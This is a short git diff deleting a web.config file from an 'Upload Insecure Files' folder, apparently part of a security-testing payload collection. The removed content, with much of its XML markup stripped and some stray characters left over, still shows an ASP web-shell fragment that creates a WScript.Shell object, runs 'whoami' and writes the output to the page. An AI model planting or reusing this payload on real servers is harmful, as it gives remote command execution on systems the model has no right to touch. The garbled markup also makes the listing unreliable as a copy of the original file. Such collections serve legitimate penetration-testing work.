diff --git a/Upload Insecure Files/Configuration IIS web.config/web.config b/Upload Insecure Files/Configuration IIS web.config/web.config deleted file mode 100644 index c14f37e5..00000000 --- a/Upload Insecure Files/Configuration IIS web.config/web.config +++ /dev/null @@ -1,34 +0,0 @@ - - - - - - - - - - - - - - - - - - - - -") -Response.write("

-
")

-

Set wShell1 = CreateObject("WScript.Shell") -Set cmd1 = wShell1.Exec("whoami") -output1 = cmd1.StdOut.Readall() -set cmd1 = nothing: Set wShell1 = nothing

-

Response.write(output1) -Response.write("

-

-–> - - \ No newline at end of file